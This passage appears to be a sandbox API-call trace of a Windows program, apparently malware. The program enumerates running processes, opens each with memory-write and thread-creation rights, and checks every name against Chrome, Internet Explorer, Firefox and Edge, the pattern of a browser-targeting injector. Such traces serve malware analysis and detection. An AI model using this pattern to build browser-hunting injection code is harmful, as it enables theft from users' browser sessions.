	[0201.628] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0201.629] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x2008
	[0201.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.629] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0201.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.629] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.629] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0201.630] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.630] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.630] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0201.631] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x200c
	[0201.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.631] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0201.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.631] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.632] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0201.632] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.632] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.632] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0201.633] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x2010
	[0201.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.633] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0201.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.633] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.633] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0201.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.634] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.634] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0201.635] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x2014
	[0201.635] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.635] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0201.635] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.635] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.635] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.635] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0201.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.636] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.636] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0201.637] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x2018
	[0201.637] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.637] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0201.637] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.637] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.637] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.637] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0201.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.638] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.638] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0201.638] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x201c
	[0201.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.639] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0201.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.639] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.639] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0201.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.639] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.639] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.640] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x2020
	[0201.640] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.640] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.641] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.641] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.641] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.641] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.642] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x2024
	[0201.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.642] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.643] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.643] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.643] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.643] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.644] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x2028
	[0201.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.644] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.645] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.645] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.645] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.645] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.647] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x202c
	[0201.647] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.647] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.647] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.647] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.647] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.647] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.648] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.648] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.649] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x2030
	[0201.649] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.649] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.649] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.649] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.649] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.649] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.650] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.650] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.651] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x2034
	[0201.651] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.651] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.651] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.651] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.651] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.651] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.652] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.652] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.652] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.652] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x2038
	[0201.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.653] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.653] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.653] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.654] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.654] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0201.654] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x203c
	[0201.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.655] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0201.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.655] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.655] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0201.656] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.656] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.656] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.657] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x2040
	[0201.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.657] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.657] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.658] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.658] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.658] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0201.659] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x2044
	[0201.659] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.659] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.659] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.659] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.660] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.660] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.660] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0201.661] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x2048
	[0201.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.661] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0201.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.661] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.662] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0201.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.662] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.662] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.663] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x204c
	[0201.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.663] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.663] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.664] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.664] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.664] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0201.665] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x2050
	[0201.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.665] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0201.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.665] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.666] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0201.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.666] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.666] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0201.667] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x2054
	[0201.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.667] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0201.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.667] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.667] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0201.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.668] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.668] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0201.669] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x2058
	[0201.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.669] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0201.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.669] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.669] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0201.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.669] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.670] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0201.670] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x205c
	[0201.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.670] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0201.671] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.671] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.671] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.671] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0201.671] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.671] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.672] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0201.672] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0201.672] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0201.673] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x2060
	[0201.673] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.673] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0201.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.674] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.674] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0201.675] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.675] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.675] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0201.676] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x2064
	[0201.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.676] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0201.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.676] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.676] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0201.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.677] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.677] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0201.678] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x2068
	[0201.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.678] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0201.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
